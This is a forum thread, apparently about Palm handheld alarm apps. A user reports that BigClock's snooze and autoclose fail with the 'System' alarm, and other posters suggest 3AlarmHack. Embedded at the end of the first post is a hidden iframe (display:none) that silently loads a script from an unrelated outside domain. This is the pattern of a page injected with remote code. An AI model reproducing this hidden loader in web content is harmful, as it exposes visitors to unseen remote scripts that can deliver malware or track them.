+ Reply to Thread

Help with bigclock

I tried bigclock last year, and I was disappointed. But the latest version looks very promising, if I could only get around a quirk (not mine, the app's).

Scenario:
    Alarm 3 is set to "System" because I found that to be much louder than trying to program one myself. Alarm goes off just fine, even in vibe mode. So far so good.

Now I want to enable snooze and autoclose, so I can have it wake me up in the morning. No luck. It's as if I didn't even enable those options.

I get this hunch, so I try using Alarm 2, which isn't set to "System". Both snooze and autoclose work perfectly. Must be something about the System alarm. Then, with snz. and autocl. set on Alarm 2, I switch back to using Alarm 3, and lo and behold, the options work for 3. What gives? The options for #2 control #3?

Anyone else have this problem, and possible solutions?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    are you keeping BC running or are you exiting out of BC? i know the alarms wont ring unless you have the app running.. atleast thats how it does with me... :drink3

Re: Help with bigclock

Originally posted by KLiuLess
    I tried bigclock last year, and I was disappointed. But the latest version looks very promising, if I could only get around a quirk (not mine, the app's).

Scenario:
    Alarm 3 is set to "System" because I found that to be much louder than trying to program one myself. Alarm goes off just fine, even in vibe mode. So far so good.

Now I want to enable snooze and autoclose, so I can have it wake me up in the morning. No luck. It's as if I didn't even enable those options.

I get this hunch, so I try using Alarm 2, which isn't set to "System". Both snooze and autoclose work perfectly. Must be something about the System alarm. Then, with snz. and autocl. set on Alarm 2, I switch back to using Alarm 3, and lo and behold, the options work for 3. What gives? The options for #2 control #3?

Anyone else have this problem, and possible solutions?
    Mine works, err Alarms go off with Bigclock running or not.

I would suggest that you add 3AlarmHack onto your phone. It allows you to expand your choice of alarms and customize how they do. Also you can assign different alarms to different pgms. I have an extremely LOAD and HIGH pitched version of the Terminator soundtrack sound that will wake me when I've only had a couple of hours of sleep.

The addition of 3ALARMHACK is essential to get the best performance though.

If you have problems finding it let me know, I have v2 of it and it gives many options.
    Remember, When the long night comes return to the end of the beginning.

I didn't notice any problems when switching out of BC. Alarms still went off just fine, but I just couldn't get the snooze and autoclose to work with the System alarm.

I'll try 3alarmhack. I found ver 2.1 for $10.

Thanks for the help.

Hmm. 3AH seems pretty good. But I still have questions about it:

- Can 3ah have a vibe alarm? Doesn't look like it. But this is OK because there's no way a vibe alarm can wake me if it's not touching me. Just thought it would be nice so I don't have to keep disabling 3ah for a certain app after I wake up.

- Can you interrupt a repeating alarm sequence without turning it off? I want my interrupt (pressing, say, the Palm up/down keys) to snooze, not disable, the alarm. If not, we're back to my original ques. about BC's ability to snooze the System alarm. There's another app I use called MultiClock that does have this ability (snooze by pressing a hardware key), but it has its own set of quirks.

I appreciate the help.